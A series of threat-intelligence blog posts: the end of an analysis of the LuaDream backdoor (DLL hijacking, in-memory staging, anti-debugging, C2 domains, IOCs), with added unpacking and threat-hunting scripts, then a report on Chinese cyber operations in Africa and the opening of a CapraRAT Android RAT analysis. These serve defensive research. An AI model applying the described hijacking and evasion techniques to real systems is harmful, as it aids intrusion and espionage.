On average, we observed a five-day gap between infiltrations into different endpoints. After gaining access, Sandman limited its activities to deploying the folders and files required for loading and executing LuaDream, refraining from any further actions. We observed the following deployed filesystem artifacts:

C:\Windows\System32\ualapi.dll
C:\ProgramData\FaxConfig\fax.dat
C:\ProgramData\FaxConfig\fax.cache
C:\ProgramData\FaxConfig\fax.module
C:\ProgramData\FaxConfig\fax.Application
C:\ProgramData\FaxLib\

Sandman abused the DLL hijacking technique to execute LuaDream. The ualapi.dll file they placed is a malicious DLL masquerading as its legitimate counterpart (a User Access Logging (UAL) component) and represents the first stage of the intricate LuaDream loading process. The ualapi.dll library is loaded by the Fax and the Spooler Windows service when started. We observed the Spooler service loading the malicious ualapi.dll on the targeted workstations, executing LuaDream in its context.

It is relevant to note that we did not observe the threat actor restarting the Fax or the Spooler service to force the execution of LuaDream, likely to evade detection based on service manipulation. Instead, they patiently waited for one of these services to load the malicious ualapi.dll when started at the next system boot.

LuaDream | Staging

The LuaDream staging process is intricate and designed with a focus on evading detection and thwarting analysis. Initiated by the Fax or the Spooler service, which would execute the UalStart export of the malicious ualapi.dll when started, the overall process consists of seven main stages. These are conducted fully in memory and involve a combination of fully-formed DLL PE images, code, and LuaJIT bytecode.

The following table shows DLL images involved in LuaDream staging:

Name Compilation timestamp Exports
ualapi.dll Wed Aug 09 18:24:18 2023 UalInstrument, UalStart, UalStop
MemoryLoadPex64.dll Wed Mar 22 23:55:07 2023 ProtectMain
common.dll Wed Aug 09 18:21:18 2023 jsadebugd

Although the DLL timestamps could have been manipulated by the threat actor, given the proximity to the August 2023 intrusion date, it is likely that the timestamps are authentic. Due to the difference of only a few days between the timestamps of ualapi.dll and common.dll, and their actual deployment dates, it is possible that these images have been built specifically for this intrusion.

Some of the implemented anti-analysis measures include hiding LuaDream’s threads from a debugger using the NtSetInformationThread function, a file close operation on an invalid handle (0x123456), which raises an exception only when a debugger is attached, detection of Wine-based sandboxes, and in-memory mapping of malicious PE images to evade EDR API hooks and file-based detections.

LuaDream staging

Next-stage code is typically packed using a combination of XOR-based encryption and compression. The fax.dat, fax.Application, and fax.module files store packed staging code. The code unpacked from fax.Application contains a LuaJIT engine enabling the execution of the LuaJIT components internally referred to as interface and crt as well as LuaDream itself.

interface unpacks crt from fax.module, which in turn retrieves XML-formatted configuration and the contents of the fax.cache file – an encrypted and compressed Lua function, which returns the reference names and implementations of LuaDream components in Base-64 encoded form.

fax.cache (unpacked form)
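The XOR-plus-compression packing described above, with fax.cache decoding into a function that hands back Base64-encoded component bodies, is a common staging pattern, and recovering the key is usually the first step of analysis. The following is an added example written for this page and is not LuaDream’s unpacker: the report does not publish the XOR key or the compression algorithm, so the single-byte key, the use of zlib, and the `name=base64` layout of the component table are assumptions chosen for illustration. It shows the analyst-side technique of brute-forcing a single-byte XOR key using successful decompression as the oracle (the zlib header and Adler-32 trailer make accidental matches unlikely), then decoding the component table.

```python
"""Brute-force a single-byte XOR key over a packed blob and inflate it.

Added example for illustration only; the key, zlib, and the component-table
layout are assumptions and do not describe LuaDream's real packing scheme.
"""
import base64
import zlib

# Constructed sample: a tiny component table in the shape the report
# describes for fax.cache (names mapped to Base64 bodies), zlib-compressed
# and XORed with an assumed single-byte key.
_ASSUMED_KEY = 0x5A
_PLAIN_COMPONENTS = {
    "main_z_protoInterface": b"-- dispatches to protocol clients (constructed stub)",
    "thread_recv": b"-- handles loadplugin / unloadplugin / saveplugin (constructed stub)",
}


def pack(components: dict, key: int) -> bytes:
    """Serialize name=base64(body) lines, zlib-compress, then XOR every byte."""
    lines = [f"{name}={base64.b64encode(body).decode()}" for name, body in components.items()]
    compressed = zlib.compress("\n".join(lines).encode())
    return bytes(b ^ key for b in compressed)


def try_unpack(blob: bytes):
    """Try all 256 single-byte keys; return (key, plaintext) for the first one
    that yields a valid zlib stream, or None if no key works."""
    if not blob:
        return None
    for key in range(256):
        candidate = bytes(b ^ key for b in blob)
        # Cheap pre-check: a zlib stream with a 32K window starts with CMF 0x78.
        if candidate[0] != 0x78:
            continue
        try:
            return key, zlib.decompress(candidate)
        except zlib.error:
            continue
    return None


def parse_components(plaintext: bytes) -> dict:
    """Split name=base64 lines back into name -> decoded body."""
    out = {}
    for line in plaintext.decode().splitlines():
        name, _, b64 = line.partition("=")
        out[name] = base64.b64decode(b64)
    return out


SAMPLE_BLOB = pack(_PLAIN_COMPONENTS, _ASSUMED_KEY)

if __name__ == "__main__":
    key, plain = try_unpack(SAMPLE_BLOB)
    for name, body in parse_components(plain).items():
        print(f"key={key:#04x} {name}: {body.decode()}")
```

For a real sample the oracle would be swapped for whatever the stage actually uses (a LuaJIT bytecode header, a PE `MZ` stub, or a different compressor), and a multi-byte key would need a longer search; the structure of the loop stays the same.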

The LuaDream configuration includes C2 and communication protocol information. The LuaDream variant we analyzed is configured to communicate with the mode.encagil[.]com domain over the WebSocket protocol.

Configuration data

LuaDream | Overview

LuaDream is a multi-component and multi-protocol backdoor, whose main features are managing attacker-provided plugins and exfiltrating system and user information. The implementation and architecture of LuaDream indicate that it is a maintained, actively developed project of a considerable scale.

Throughout our analysis, we observed what is likely a malware version string (12.0.2.5.23.29), which the backdoor sends to the C2 server when exfiltrating information. Many LuaDream function and variable definitions follow a naming convention involving the word fun, such as dofun_RUN_FUN_LIST_, and FunGetDataCache.

LuaDream implements testing functions as well as error and execution status logging, which indicates that the malware is likely still in active development. A string artifact in a function labeled com_TestJson suggests potential development in June 2022.

Testing functions (decompiled LuaJIT bytecode)

We observed the embedded private IP address 10.2.101[.]99 to which LuaDream binds the communication port 4443, if so configured. This address does not belong to the IP address spaces of the targeted environments. The IP address may be a leftover from an in-development LuaDream variant or from a previous Sandman engagement.

LuaDream | Components And Features

The LuaDream variant we obtained from the targeted environments consists of 34 components: 13 core and 21 support components. They are implemented in LuaJIT bytecode and use the Windows API through the ffi library using C language bindings.

The support components implement Lua libraries as well as Windows API definitions required for LuaDream’s operation, such as xml2lua, Windows Sockets, and NtSec API.

The core components implement LuaDream features, such as initialization, gathering system and user information, C2 communication, and plugin management. As per the component definitions from the fax.cache file, the core LuaDream components are structured into two categories: .com and .main.

LuaDream core components

With the main component initializing LuaDream, the backdoor connects to the configured C2 server and exfiltrates system, user, and malware-related information gathered by BGetSystemMsg. This information includes the malware version, assigned IP and MAC addresses, OS version, available memory, and the name, PID, and username associated with the process in whose context LuaDream runs.

Exfiltrated information

LuaDream has the capability to reach out to C2 servers but also to act as an implant listening for incoming connections. The backdoor can communicate over the TCP, HTTPS, WebSocket, and QUIC protocols. The main_proto_X_TcpClient, main_proto_WinHttpClient, main_proto_X_WebSocketClient, and main_proto_X_QuicClient components implement support for these protocols, with main_z_protoInterface acting as their main handler.

Protocol handling (decompiled LuaJIT bytecode)

The main_proto_A_QueryDns component resolves domains to IP addresses using the cloudflare-dns[.]com service, which main_proto_X_WebSocketClient uses for resolving C2 domain names.

main_proto_X_QuicClient draws functionalities from a DLL image which LuaDream maps fully in memory, a functionality implemented by the Acom_LoadDLL component.

LuaDream communicates with a C2 server using the thread_connect, thread_send, and thread_recv components, which are responsible for connecting to, sending data to, and receiving data from the C2 server, respectively. These components operate in separate threads. The exchanged data is in JSON and XML format, in an encrypted and compressed form. The Acom_define component provides functionalities for inter-thread communication and data manipulation.

The thread_recv component handles incoming messages and its main purpose is to manage attacker-provided plugins that extend LuaDream. Some functionalities of this component include:

  • taking LuaDream offline (command offline);
  • loading, executing (command loadplugin), unloading (command unloadplugin), and saving plugins (command saveplugin);
  • executing an attacker-specified plugin functionality.

LuaDream maintains a key-based list of plugin information, which includes the handle and the ID of the thread in which the plugin runs, and a plugin-identifying key. Loading of a plugin involves inserting a new entry in this list and executing plugin code in a designated thread. For communicating with plugins, LuaDream leverages inter-thread communication, using the message 1234 for executing plugin functionalities.

LuaDream plugin list (from decompiled LuaJIT bytecode)

Our analysis of LuaDream staging samples shared on VirusTotal revealed the existence of two additional components named main_proto_WinHttpServer and thread_test. main_proto_WinHttpServer implements a LuaDream capability to listen for incoming connections based on the Windows HTTP server API. thread_test implements functions for testing the loadplugin and saveplugin commands. These functions indicate the existence of a plugin named cmd, whose name suggests command execution capabilities.

cmd plugin references

Network Infrastructure

The LuaDream samples we analyzed communicate with the C2 servers ssl.explorecell[.]com and mode.encagil[.]com. ssl.explorecell[.]com is a Tucows-registered domain with a first-seen resolution date of March 2023. This domain last resolved to 185.82.218[.]230, an IP address of a server hosted in Bulgaria by the ITLDC hosting provider.

mode.encagil[.]com is an Arsys-registered domain with a first-seen resolution date of August 2023. The domain last resolved to 172.67.173[.]208 and 104.21.47[.]226, IP addresses of a server hosted behind a major load balancing platform. The shift from using a directly exposed C2 server IP address to addresses of a load balancing infrastructure marks a change in Sandman’s infrastructure management practices – likely to avoid exposing the true hosting location.

Examination of C2 netflow data revealed a lack of comprehensive C2 infrastructure segmentation, with several LuaDream deployments at geographically dispersed victim environments communicating with the same C2 server.

Conclusions

Attributing Sandman remains a mystery, placing it in the same enigmatic category as Metador and other elusive threat actors who operate with impunity. LuaDream stands as a compelling illustration of the continuous innovation and advancement efforts that cyber espionage threat actors pour into their ever-evolving malware arsenal.

Navigating the shadows of the threat landscape necessitates consistent cooperation and information sharing within the threat intelligence research community. SentinelLabs remains dedicated to this mission and hopes that this publication will serve as a catalyst for further collaborative efforts. We are grateful for the contributions of Luca Palermo from the SentinelOne EMEA IR TAM team, who assisted with the initial investigations and remediation of the threat.

Indicators of Compromise

SHA1 File name
1cd0a3dd6354a3d4a29226f5580f8a51ec3837d4 fax.dat
27894955aaf082a606337ebe29d263263be52154 fax.Application
5302c39764922f17e4bc14f589fa45408f8a5089 ualapi.dll
77e00e3067f23df10196412f231e80cec41c5253 fax.cache
b9ea189e2420a29978e4dc73d8d2fd801f6a0db2 UpdateCheck.dll
fb1c6a23e8e0693194a365619b388b09155c2183 updater.ver
ff2802cdbc40d2ef3585357b7e6947d42b875884 fax.module

LuaDream Folder File paths
%ProgramData%\FaxConfig
%ProgramData%\FaxLib

C2 Server Domains
mode.encagil[.]com
ssl.explorecell[.]com
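An added hunting example, written for this page and not SentinelOne detection content, that ties together the deployment pattern from the Threat Actor Activities section (a service loading a planted ualapi.dll, the FaxConfig and FaxLib staging directories), the DNS-over-HTTPS resolution via cloudflare-dns[.]com described under Components And Features, and the hashes and domains listed above. The event dictionaries are constructed telemetry in a generic shape; the field names, the `Microsoft Windows` signer string, and the placement of the staging directories under C:\ProgramData are assumptions about the environment. spoolsv.exe and fxssvc.exe are the Print Spooler and Fax service images.

```python
"""Hunt for LuaDream deployment traces in endpoint telemetry (added example)."""
import os

# Hashes and domains from the report's IOC section.
IOC_SHA1 = {
    "1cd0a3dd6354a3d4a29226f5580f8a51ec3837d4",  # fax.dat
    "27894955aaf082a606337ebe29d263263be52154",  # fax.Application
    "5302c39764922f17e4bc14f589fa45408f8a5089",  # ualapi.dll
    "77e00e3067f23df10196412f231e80cec41c5253",  # fax.cache
    "b9ea189e2420a29978e4dc73d8d2fd801f6a0db2",  # UpdateCheck.dll
    "fb1c6a23e8e0693194a365619b388b09155c2183",  # updater.ver
    "ff2802cdbc40d2ef3585357b7e6947d42b875884",  # fax.module
}
IOC_DOMAINS = {"mode.encagil.com", "ssl.explorecell.com"}
DOH_RESOLVER = "cloudflare-dns.com"
# Assumption: %ProgramData% resolves to C:\ProgramData on the hosts in scope.
STAGING_DIRS = ("c:\\programdata\\faxconfig", "c:\\programdata\\faxlib")
# Print Spooler and Fax service images: the processes observed loading ualapi.dll.
SERVICE_IMAGES = {"spoolsv.exe", "fxssvc.exe"}
MS_SIGNER = "Microsoft Windows"  # assumption: how the telemetry names the signer


def _basename(win_path: str) -> str:
    return os.path.basename(win_path.replace("\\", "/")).lower()


def check_image_load(ev: dict):
    """Flag ualapi.dll loaded into a service when it is a known sample or unsigned."""
    if ev["process"].lower() not in SERVICE_IMAGES or _basename(ev["image"]) != "ualapi.dll":
        return None
    if ev.get("sha1", "").lower() in IOC_SHA1:
        return "known LuaDream ualapi.dll loaded (IOC hash match)"
    if ev.get("signer") != MS_SIGNER:
        return "ualapi.dll loaded by service is not Microsoft-signed (DLL hijack candidate)"
    return None


def check_file_create(ev: dict):
    """Flag any write under the FaxConfig/FaxLib staging directories."""
    if ev["path"].lower().startswith(STAGING_DIRS):
        return f"file written under LuaDream staging directory: {ev['path']}"
    return None


def check_network(ev: dict):
    """Flag service processes reaching the C2 domains or the DoH resolver."""
    if ev["process"].lower() not in SERVICE_IMAGES:
        return None
    dst = ev["dst_host"].lower()
    if dst in IOC_DOMAINS:
        return f"service process contacted LuaDream C2 domain {dst}"
    if dst == DOH_RESOLVER:
        return "service process issued DNS-over-HTTPS query (LuaDream resolves C2 via cloudflare-dns.com)"
    return None


CHECKS = {"image_load": check_image_load, "file_create": check_file_create, "network": check_network}


def hunt(events):
    """Run every check over the event stream and return one finding per hit."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev["type"])
        reason = check(ev) if check else None
        if reason:
            findings.append({"host": ev["host"], "process": ev["process"], "reason": reason})
    return findings


# Constructed sample telemetry (not real data): one workstation showing the
# full chain, plus two benign events that must not fire.
SAMPLE_EVENTS = [
    {"type": "image_load", "host": "WS-07", "process": "spoolsv.exe",
     "image": "C:\\Windows\\System32\\ualapi.dll",
     "sha1": "5302c39764922f17e4bc14f589fa45408f8a5089", "signer": None},
    {"type": "image_load", "host": "WS-07", "process": "spoolsv.exe",
     "image": "C:\\Windows\\System32\\winspool.drv",
     "sha1": "0" * 40, "signer": MS_SIGNER},  # benign; hash is constructed
    {"type": "file_create", "host": "WS-07", "process": "cmd.exe",  # writer is constructed
     "path": "C:\\ProgramData\\FaxConfig\\fax.cache"},
    {"type": "network", "host": "WS-07", "process": "spoolsv.exe",
     "dst_host": "cloudflare-dns.com", "dst_port": 443},
    {"type": "network", "host": "WS-07", "process": "spoolsv.exe",
     "dst_host": "mode.encagil.com", "dst_port": 443},
    {"type": "network", "host": "WS-07", "process": "chrome.exe",
     "dst_host": "cloudflare-dns.com", "dst_port": 443},  # benign browser DoH
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']} {f['process']}: {f['reason']}")
```

The signer check matters more than the hash list: the report notes the DLLs were likely built for this intrusion, so hashes will not carry over to the next victim, whereas the Spooler or Fax service loading a ualapi.dll that Microsoft did not sign is the durable signal. The DoH rule is a heuristic; a browser talking to cloudflare-dns.com is expected, a print service doing so is not.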

Cyber Soft Power | China’s Continental Takeover

By: Tom Hegel
21 September 2023 at 17:00

Executive Summary

  • SentinelLabs observes sustained tasking towards strategic intrusions by Chinese threat actors in Africa, designed to extend influence throughout the continent.
  • New attacks include those against telecommunication, finance and government, attributed to the BackdoorDiplomacy APT and the threat group orchestrating Operation Tainted Love.
  • China’s engagement in soft power diplomacy has a lengthy history, yet the use of strategic cyber intrusions highlights recent objectives and potential lasting impact in Africa.
  • To better manage the challenge of tracking state-aligned cyber activities in less monitored areas like Africa and Latin America, we are announcing the formation of the ‘Undermonitored Regions Working Group’. Launched today at LABScon, this effort calls upon established security researchers to join analytic capabilities, combine telemetry, resources, and local expertise, and promote a unified approach to analyzing cyber operations used to support soft power agendas in Africa and Latin America.

Introduction

In the evolving cyber threat landscape, it’s always important to constantly challenge our biases. There are large pockets of important threat activity occurring in regions around the world less commonly addressed in Western threat research. While much attention has rightfully been drawn to Chinese threat actors targeting the West, the broader set of global activity supporting and promoting similar interests remains opaque. At a time of pervasive foreign activities towards cornering natural resources and co-opting the governance of less represented countries, we have to ask– what is happening across the vast African continent?

As we contemplate where China might stand in the global arena in the next 5 to 10 years, it’s evident that there exists a considerable gap in the realm of cyber threat intelligence with regards to Africa as a whole, and more specifically how it ties into the long term agenda of the People’s Republic of China (PRC). Africa, with its highly complex and dynamic environment, poses a unique challenge for accurately characterizing its cyber threat landscape.

In the threat intelligence industry, we have a habit of overlooking regions where our immediate financial interests don’t appear to be at stake. Yet, it is precisely in places like Africa and Latin America that we witness these threat actors subtly shifting the balance of negotiations and playing pivotal roles in larger geopolitical strategies. There’s an urgent need to acknowledge the importance of these frequently overlooked regions in the global threat landscape and take radical steps to close the gap in our situational awareness. These regions are shaping up to be the battlegrounds of the future.

Our focus is on incentivizing strategic intelligence on the state of cyber operations targeting Africa. We recognize that these operations need to be placed in the greater context of multidimensional campaigns that include more traditional forms of espionage, market maneuvers, and influence. This is vital in understanding the PRC’s geostrategic ambitions and technological investments, and are fundamental in forging a forward-thinking and holistic defense approach. We’ll highlight key examples including the targeting from Chinese state-sponsored APTs, such as Op. Tainted Love and BackdoorDiplomacy, and how they blend into PRC’s soft power agenda across Africa.

Background on Soft Power Engagement

While cyber capabilities are important, they are just one of the more recent tools used in implementing broad national soft power strategies. Spanning several decades, China’s involvement in the continent has adapted to embrace economic, political, and cultural dimensions that represent both comprehensive and strategic opportunities. The establishment of Confucius Institutes and expanding media investments have been a tool in crafting narratives that underline the positive aspects of its engagement in Africa.

China has engaged in significant strategic investments in Africa, considered ‘debt-trap diplomacy’. This refers to a scenario where a creditor country extends excessive credit to a debtor country with the presumed intention of extracting economic or political concessions when the debtor country cannot meet its repayment terms.

Specifically in Africa, China has financed large critical infrastructure projects in many African countries. Countries pursuing economic and infrastructure development have found China a willing and eager investor over the last decade. Future adverse effects are easily brushed aside by the immediate perceived benefits of these investments.

Offensive Cyber Operations as a Support Tool of Soft Power Agendas

In recent years, we have tracked targeted intrusions against key industrial sectors in various African nations. These attacks conspicuously align with China’s broader soft power and technological agenda in the region, focusing on critical areas such as the telecommunication sector, financial institutions, and governmental bodies. Three significant sets of activity best exemplify this dynamic across the larger set of China-aligned activity in Africa.

Operation Tainted Love

In March 2023, we shared details of Operation Tainted Love, a case centered on targeted attacks against telecommunications providers predominantly located in the Greater Middle East region. This discovery marked an evolution of the toolkit involved in Operation Soft Cell, forging immediate connections to previous China-attributed activities.

From Operation Tainted Love, we highlighted the use of a rigorously maintained and version-controlled system for credential theft, accompanied by a novel dropper mechanism. The overall findings are suggestive of a concerted development effort undertaken by a threat actor, or threat actors support structure, driven by specific objectives.

Operation Tainted Love

Unnoted in our initial report, we identified the compromise of a telecommunications entity based in North Africa by the same threat actor. The timing of this activity aligned closely with Chinese telecommunication soft power interests in Africa, as the organization was in private negotiations for further regional expansion. Strategic objectives in such intrusions highlight interest from China in internal business knowledge on negotiations, providing competitive advantage, or prepositioning for retained technical access for intelligence collection.

Backdoor Diplomacy

For several years, another APT primarily referred to as BackdoorDiplomacy has operated across Africa. Recently, fresh revelations emerged spotlighting the group’s sustained three-year endeavor targeting governmental organizations in Kenya. Delving into prior public technical reports by ESET, Unit42, and BitDefender unveils a targeting paradigm bearing resemblance to those employed in Operation Tainted Love.

BackdoorDiplomacy seemingly concentrates efforts on government entities, along with high-priority telecommunications and finance organizations. The group has orchestrated a series of notable espionage campaigns across Africa in recent years. Through analysis of infrastructure tied to this actor, we assess that multiple African countries have been targeted over the last few years, including at least South Africa, Kenya, Senegal, and Ethiopia. As noted by previous reporting, the threat actor does maintain operations throughout the Middle East, and can be found in other regions of particular PRC interest.

Our current perspective suggests a close relationship between BackdoorDiplomacy and another Chinese state sponsored threat actor, APT15.

Threat Actors Ambiguity

A broader set of China-aligned campaigns has been active across Africa, as emphasized by recent reports on FamousSparrow and Earth Estries. Pinpointing precise clustering for these groups remains challenging due to a prevalence of shared technical resources. However, TTPs and targeting objectives are somewhat related to the APT41 umbrella.

In a separate case, Chinese espionage efforts against the African Union (AU) was allegedly discovered in 2017. According to initial reports, for a period of five years, from 2012 to 2017, the Chinese government maintained backdoor access into servers for the African Union’s headquarters in Ethiopia. The $200 million dollar headquarters was funded and built by China between 2009 and 2012. Notably, the network infrastructure and services were reportedly Huawei technology since the initial construction.

African Union Headquarters, Addis Ababa

More recently in 2020, Japan’s CERT notified AU IT staff of an intrusion they attributed to the Bronze President APT, a separately tracked Chinese threat actor. In this intrusion, Bronze President was observed exfiltrating surveillance footage from the AU headquarters facility. This case may highlight how much of a real priority intelligence inside the AU is to Beijing, ultimately forcing their hand on moving away from backdoored equipment to performing actual intrusions through well tracked APTs.

In both the 2017 and 2020 cases, African Union and Chinese officials denied any sort of intrusion. As quoted by Reuters, a former AU official told them “Attacking the Chinese, for us, it’s a very bad idea.” A review of specifics around China’s technological soft power in Africa highlights some reasons why the official may have said that.

Technological Soft Power, Reliance, and Abuse Opportunities

The digital landscape of Africa has undergone a seismic transformation, largely facilitated through Chinese tech giants deploying extensive resources to meet the continent’s critical technological needs.

China has taken a lead role in Africa’s telecommunication, finance, and surveillance technology sectors. This initiative ties into China’s Digital Silk Road project, announced in 2015.

Telecommunication Networks

At the forefront of technology investment in Africa are Huawei and ZTE, powerhouses steering efforts to bridge the connectivity divide separating urban and rural landscapes of the continent. These corporations have brought the boon of digital connectivity to the remotest corners of Africa.

In the two decades since Huawei began expanding into Africa, it has grown to become the leading telecommunication technology and service provider across much of the continent.

Yet, underneath the altruistic veneer may lie a strategy anchored on fostering an overwhelming dependence on Chinese technology. Through a sweeping range of initiatives that span from mobile networks to broadband infrastructure, the strategy envisions a society deeply tied to China’s digital ecosystem, guiding future socio-political paths and holding significant sway over personal freedoms.

This rise isn’t merely a route to economic enrichment; it empowers China to shape policies and narratives aligned with its geostrategic ambitions, establishing itself as a pivotal and defining force in Africa’s digital evolution. Targeted intrusions by the BackdoorDiplomacy APT and the threat group orchestrating Operation Tainted Love indicate a level of intention directed at supporting such agendas.

Instances of infringement on internet rights and the misuse of technology are already evident in countries such as Sudan, Ethiopia, Zimbabwe, Gabon, and the Democratic Republic of Congo. In some of these nations, the governments have resorted to shutting down social media and internet services as a strategy to suppress civil unrest, or even spying on the network communications of its citizens.

China has also ventured to enhance its command over the underwater fiber networks connected to the African continent. Leveraging significant investments in projects such as the PEACE cable initiative, China has been laying cables that aim to rejuvenate Africa’s digital connectivity, ostensibly offering the continent much needed information accessibility.

Peace Cable Map, TeleGeography

These underwater pathways hold enormous significance in dictating the flow of information between continents. In taking ownership of them, China stands in a position to potentially orchestrate and steer digital dialogues on the African continent, forging a narrative that aligns seamlessly with its geopolitical objectives.

Controlling these undersea networks gives China the capacity to monitor the data flowing through them, raising serious concerns regarding data privacy and national sovereignty. To gauge the potential for misuse, we only need to examine how China manages its own domestic networks, offering a window into the possible ramifications of granting them such control.

Mobile Payment Platforms

In recent years, digital mobile banking platforms like M-Pesa have revolutionized Africa’s financial landscape, promoting unprecedented financial inclusion especially in areas underserved by traditional banks. With 51 million users processing over $314 billion in transactions annually, its footprint is substantial.

M-Pesa has since been migrated to Huawei’s Mobile Money Platform. Similarly, China-backed entities OPay and PalmPay have seized a considerable market share, facilitating a large portion of the continent’s financial transactions.

This should raise apprehensions around the nature of China’s influence, with potential avenues for financial monopolies and the control it gives to Chinese stakeholders in the dictation of economic trajectories across the African continent.

The intensive data mining, user surveillance, and user disruption that are characteristic of Chinese tech giants present a significant risk of exploitation, infringing upon the privacy rights of individuals and potentially undermining the sovereignty of African nations. The depth and breadth of data these platforms can amass and control raise serious concerns about how it might be utilized, perhaps to shape consumer behavior, influence public opinion, or even foster dependencies that go beyond financial transactions.

While services offered by these platforms are undeniably bringing about a financial revolution, it’s creating a scenario where a foreign power has an overwhelming influence over the financial stability, habits, and preferences of a significant portion of the African populace. Financial inclusion and potential manipulation hang in a precarious balance, necessitating a critical appraisal of the long-term implications of this growing influence.

Surveillance

Huawei’s Smart City venture is also emerging as a central pillar in China’s escalating soft power influence in Africa. This initiative pivots on a suite of surveillance services including facial recognition, artificial intelligence, data analytics, and 5G network deployments, all purportedly claimed to enhance urban management, augment public safety, and spur economic development. Yet, the flipside of this technological investment is the possibility of a surveillance era of unparalleled scope, exploiting a diverse array of data from daily life to cultivate a society where personal privacy could soon become obsolete.

Across Africa, nations like Kenya, Mauritius, Uganda, and Zambia have embraced Huawei, infusing surveillance technology into the heartbeat of their urban landscapes. In Kenya, the Safe City project — powered by Huawei’s system encompassing CCTV and facial recognition technologies — monitors Nairobi and other primary cities. In Uganda, one such case of surveillance reportedly led to the regime seeking to silence political opponent Bobi Wine, accomplished through the help of Huawei staff and services. These same capabilities can be found in many other countries throughout Africa.

Bobi Wine, source: Bloomberg

Other noteworthy activity includes the Chinese business CloudWalk Technology providing facial recognition surveillance technology to Zimbabwe. CloudWalk has been accused of being involved in human rights violations and transgressions perpetrated during China’s campaign targeting Uighurs, ethnic Kazakhs, and other Muslim minority groups in the Xinjiang Uighur Autonomous Region. This campaign is characterized by widespread repression, indiscriminate detentions, enforced labor, and intensive high-tech surveillance.

Once these smart cities come to fruition, they will operate fundamentally on Chinese technology, often granting Beijing real-time insight into these nations at the expense of personal privacy and national safeguards. Moreover, these nations drift towards further reliance on Chinese expertise and technical resources for the use and administration of these systems into the future.

A Force for Good

African nations face the delicate task of leveraging Chinese tech innovations while preserving their autonomy and digital rights, a tightrope walk exacerbated by limited alternatives. Concurrently, it’s imperative for the cybersecurity community to deepen our understanding of China’s cyber activities in Africa to prevent unwanted encroachment.

Due to escalating cyber threats in overlooked areas such as Africa and Latin America, we are launching the Undermonitored Regions Working Group (URWG). This initiative is focused on addressing the unique cybersecurity hurdles faced in these regions, frequently sidelined in mainstream global cyber discussions.

Our mission transcends geographical boundaries as we track state-sponsored threats emerging globally, whether from China, Russia, or Egypt. We are determined to cultivate a technical research collaboration, harnessing our collective expertise to identify new threats and devise effective countermeasures against them.

SentinelLabs embodies our commitment to sharing openly – providing tools, context, and insights to strengthen our collective mission of a safer digital life for all. We are seeking out security researchers, intelligence analysts, and those passionate about understanding and improving the cyber threat narrative to grow these efforts through unconventional means. By pooling our knowledge and technical prowess, we strive to nurture a digital future in support of less monitored parts of the world.

Conclusion

As we have navigated through the complexities of Chinese influence in Africa, the role of offensive cyber actions, and the broader implications of tech dominance, it becomes evident that this intricate web of geopolitics and cyber threats demands attention across the cybersecurity industry.

Recognizing Africa’s centrality in the future of global cyber dynamics helps not only the safeguarding of the continent’s digital freedoms but fortifies the global ecosystem against sophisticated threat actors.

The story of Africa’s digital landscape today is, in essence, the precursor to the global narrative of tomorrow. We should work in tandem to craft it as one of security, prosperity, and shared progress.

CapraTube | Transparent Tribe’s CapraRAT Mimics YouTube to Hijack Android Phones

18 September 2023 at 13:00

Executive Summary

  • SentinelLabs identified three Android application packages (APK) linked to Transparent Tribe’s CapraRAT mobile remote access trojan (RAT).
  • These apps mimic the appearance of YouTube, though they are less fully featured than the legitimate native Android YouTube application.
  • CapraRAT is a highly invasive tool that gives the attacker control over much of the data on the Android devices that it infects.

Background

Transparent Tribe is a suspected Pakistani actor known for targeting military and diplomatic personnel in both India and Pakistan, with a more recent expansion to the Indian Education sector. Since 2018, reports have detailed the group’s use of what is now called CapraRAT, an Android framework that hides RAT features inside of another application. The toolset has been used for surveillance against spear-phishing targets privy to affairs involving the disputed region of Kashmir, as well as human rights activists working on matters related to Pakistan.

Transparent Tribe distributes Android apps outside of the Google Play Store, relying on self-run websites and social engineering to entice users to install a weaponized application. Earlier in 2023, the group distributed CapraRAT Android apps disguised as a dating service that conducted spyware activity.

One of the newly identified APKs reaches out to a YouTube channel belonging to Piya Sharma, which has several short clips of a woman in various locales. This APK also borrows the individual’s name and likeness. This theme suggests that the actor continues to use romance-based social engineering techniques to convince targets to install the applications, and that Piya Sharma is a related persona.

CapraRAT is a comprehensive RAT that provides the actors with the ability to harvest data on demand and exfiltrate it. Notable features include:

  • Recording with the microphone, front & rear cameras
  • Collecting SMS and multimedia message contents, call logs
  • Sending SMS messages, blocking incoming SMS
  • Initiating phone calls
  • Taking screen captures
  • Overriding system settings such as GPS & Network
  • Modifying files on the phone’s filesystem

App Analysis

CapraRAT is distributed as an Android APK. When the tool was initially named by Trend Micro, their research team noted that CapraRAT may be loosely based on the AndroRAT source code.

We performed static analysis on two YouTube-themed CapraRAT APKs:

  • 8beab9e454b5283e892aeca6bca9afb608fa8718 – yt.apk, uploaded to VirusTotal in July 2023
  • 83412f9d757937f2719ebd7e5f509956ab43c3ce – YouTube_052647.apk, uploaded to VirusTotal in August 2023

We also identified a third APK called Piya Sharma, named after the YouTube channel persona described earlier:

  • 14110facecceb016c694f04814b5e504dc6cde61 – Piya Sharma.apk, uploaded to VirusTotal in April 2023

The yt.apk and YouTube_052647.apk apps are disguised as YouTube, borrowing the YouTube icon.

Applications icons on an Android device, including YouTube_052647.apk
Application icons, including the Piya Sharma app
YouTube_052647.apk displays the YouTube website when launched

The app requests several permissions. YouTube is an interesting choice for masquerading the app: some permissions, like microphone access, make sense for recording or search features. Other permissions – like the ability to send and view SMS – are less relevant to the expected app behaviors.


Permissions prompts during install of the weaponized YouTube app

Installation permissions requested by the Piya Sharma APK

When the app is launched, MainActivity’s load_web method launches a WebView object to load YouTube’s website. Because this loads within the trojanized CapraRAT app’s window, the user experience is different from the native YouTube app for Android and akin to viewing the YouTube page in a mobile web browser.

Smali snippet of the load_web method in MainActivity

Key Components

Because CapraRAT is a framework inserted into a variety of Android applications, the files housing malicious activity are often named and arranged differently depending on the app. The CapraRAT APKs we analyzed contain the following files:

Name: yt.apk
  Configuration: com/media/gallery/service/settings
  Version: MSK-2023
  Main: com/media/gallery/service/MainActivity
  Malicious Activity: com/media/gallery/service/TPSClient

Name: YouTube_052647.apk
  Configuration: com/Base/media/service/setting
  Version: A.F.U.3
  Main: com/Base/media/service/MainActivity
  Malicious Activity: com/Base/media/service/TCHPClient

Name: Piya Sharma.apk
  Configuration: com/videos/watchs/share/setting
  Version: V.U.H.3
  Main: com/videos/watchs/share/MainActivity
  Malicious Activity: com/videos/watchs/share/TCPClient

